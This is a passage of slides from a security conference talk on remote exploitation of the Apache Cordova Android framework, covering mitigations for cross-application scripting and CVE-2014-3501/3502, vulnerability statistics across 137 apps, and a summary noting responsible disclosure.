![Page 67: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/67.jpg)
Avoiding Cross-Application Scripting
Leak
Avoid the vulnerability:
Never allow user input to control the embedded browser’s URL via WebView.loadUrl
Make exploitation harder: 1. Don’t enable JavaScript (unless needed) 2. Don’t enable universal (or file) access from file
URLs (unless needed)
![Page 68: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/68.jpg)
Cordova Data Exfiltration Issues (CVE-2014-3501/2)
Leak
CVE-2014-3501: Can be mitigated by using Content Security Policy (CSP) metatags (WebSockets in WebViews honor CSP)
![Page 69: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/69.jpg)
Cordova Data Exfiltration Issues (CVE-2014-3501/2)
Leak
CVE-2014-3501: Can be mitigated by using Content Security Policy (CSP) metatags (WebSockets in WebViews honor CSP) CVE-2014-3502: Plugin released for complete mitigation. 3.6.0 will have a full fix via expanded whitelist
![Page 70: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/70.jpg)
STATS
![Page 71: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/71.jpg)
Stats
• Sample set of 137 Cordova apps • 95 apps are exploitable • Several banking apps are vulnerable
Leak
![Page 72: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/72.jpg)
Stats
• Sample set of 137 Cordova apps • 95 apps are exploitable • Several banking apps are vulnerable
• Only a single app has updated to
latest Cordova!
Leak
![Page 73: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/73.jpg)
DISCUSSION & SUMMARY
![Page 74: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/74.jpg)
Discussion & Summary
Leak
• We found severe vulnerabilities in one of the most popular Android frameworks
• Responsibly disclosed the issues
• Fixes/mitigation are available
• Android defense mechanisms broke Cordova so they were disabled
• App developers are slow in updating
![Page 75: THE BANK JOB: MOBILE EDITION - OWASP · THE BANK JOB: MOBILE EDITION Remote Exploitation of the Cordova Framework Roee Hay & David Kaplan IBM Security Systems X-Force Application](https://reader035.fdocuments.us/reader035/viewer/2022062601/5c341dd909d3f217298bb133/html5/thumbnails/75.jpg)
Intent i = new Intent(); i.setData(“Questions?”);
Follow us on Twitter: @roeehay @DepletionMode